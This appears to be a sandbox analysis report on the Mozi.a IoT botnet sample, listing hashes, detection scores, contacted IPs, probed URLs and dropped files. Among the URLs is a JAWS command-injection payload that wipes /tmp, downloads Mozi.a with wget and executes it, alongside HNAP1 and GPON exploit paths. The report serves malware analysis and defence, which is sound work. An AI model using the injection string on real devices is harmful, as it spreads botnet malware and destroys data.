Mozi.a

Status: finished

Submission Time: 2020-06-16 22:30:29 +02:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
239067
API (Web) ID:
374026
Analysis Started:

2020-06-16 22:30:29 +02:00
Analysis Finished:

2020-06-16 22:38:30 +02:00
MD5:
9a111588a7db15b796421bd13a949cd4
SHA1:
034c8c51a58be11ca620ce3eb0d43d5a59275d2f
SHA256:
e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 41/60

Open Full Report

malicious

Score: 17/40

malicious

Score: 18/31

malicious

IPs

IP	Country	Detection
21.148.6.67	United States
104.113.159.70	United States
154.56.192.51	United States
Click to see the 97 hidden entries
157.66.253.158	unknown
164.180.30.103	United States
86.216.75.198	France
110.242.68.58	China
141.96.215.180	Belgium
68.230.196.198	United States
29.146.8.145	United States
5.12.137.195	Romania
78.231.3.63	France
8.234.233.15	United States
35.193.108.104	United States
118.230.72.112	China
79.197.99.83	Germany
4.20.45.30	United States
109.190.244.146	France
211.242.127.94	Korea Republic of
73.176.120.49	United States
123.134.1.45	China
105.59.235.73	Kenya
159.45.166.49	United States
174.95.72.129	Canada
31.158.76.24	Italy
150.30.25.69	Japan
217.140.146.127	Finland
137.177.123.221	United States
188.99.64.59	Germany
204.49.14.249	United States
201.241.233.29	Chile
120.3.224.30	China
175.200.215.53	Korea Republic of
220.192.90.154	China
163.163.247.193	Belgium
206.17.100.233	United States
57.35.194.188	Belgium
94.172.149.96	Netherlands
213.3.4.52	Switzerland
24.220.139.166	United States
185.193.42.207	Germany
53.250.215.93	Germany
68.59.181.234	United States
110.75.245.38	China
116.121.216.63	Korea Republic of
54.177.215.136	United States
31.77.132.24	United Kingdom
168.158.197.21	United States
114.183.106.17	Japan
44.15.42.5	United States
148.239.245.111	Mexico
178.143.161.188	Slovakia (SLOVAK Republic)
99.83.148.123	United States
131.218.117.155	United States
190.163.47.79	Chile
59.56.248.115	China
116.79.16.216	China
141.133.77.27	United States
9.237.184.61	United States
132.122.107.181	United States
135.248.161.245	United States
201.6.235.180	Brazil
69.105.127.185	United States
43.114.212.238	Japan
92.59.17.211	Spain
136.94.63.103	United States
169.44.209.12	United States
59.147.136.145	Japan
56.115.78.221	United States
3.14.228.145	United States
207.213.193.205	United States
38.211.111.232	United States
147.140.226.140	United States
212.96.31.254	Ghana
142.244.42.117	Canada
163.45.54.156	Japan
217.21.163.3	Latvia
175.236.26.112	Korea Republic of
25.224.193.120	United Kingdom
85.157.22.94	Finland
16.173.176.148	United States
179.165.20.13	Brazil
80.151.127.254	Germany
5.211.248.59	Iran (ISLAMIC Republic Of)
171.189.114.192	United States
201.48.57.180	Brazil
217.137.199.24	United Kingdom
34.221.127.200	United States
42.116.246.231	Viet Nam
190.97.135.95	Colombia
162.78.24.247	United States
90.255.97.91	United Kingdom
91.151.224.252	Lebanon
57.57.223.213	Belgium
80.148.110.191	Germany
40.212.166.67	United States
76.97.61.180	United States
138.125.204.89	United States
178.34.44.243	Russian Federation
61.69.6.74	Australia

URLs

Name	Detection
http://31.195.194.224:80/HNAP1/
http://209.68.46.201:80/HNAP1/
http://36.78.69.20:80/HNAP1/
Click to see the 22 hidden entries
http://85.153.39.242:80/HNAP1/
http://52.221.153.162:80/HNAP1/
http://23.35.172.183:80/HNAP1/
http://122.51.112.148:49152/soap.cgi?service=WANIPConn1
http://154.214.9.106:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://104.73.5.46:80/HNAP1/
http://154.210.233.170:80/HNAP1/
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://116.211.201.87:80/HNAP1/
http://127.0.0.1:80/GponForm/diag_Form?images/
http://217.73.146.228:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.pastebin.ca/upload.php
http://www.alsa-project.org/cardinfo-db/
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://www.alsa-project.org
http://www.pastebin.ca
http://upx.sf.net
http://www.alsa-project.org/alsa-info.sh
http://www.alsa-project.org.
http://www.pastebin.ca.
http://pastebin.ca)

Dropped files

Name	File Type	Hashes
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/usr/networks	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
Click to see the 97 hidden entries
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountall.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/keyutils/request-key-debug.sh	ASCII text	#
/usr/share/hplip/hplip_clean.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/libsane/plustek/MakeModule.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/libreoffice/soffice.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#

Mozi.a

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

Mozi.a Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

Search started

Mozi.a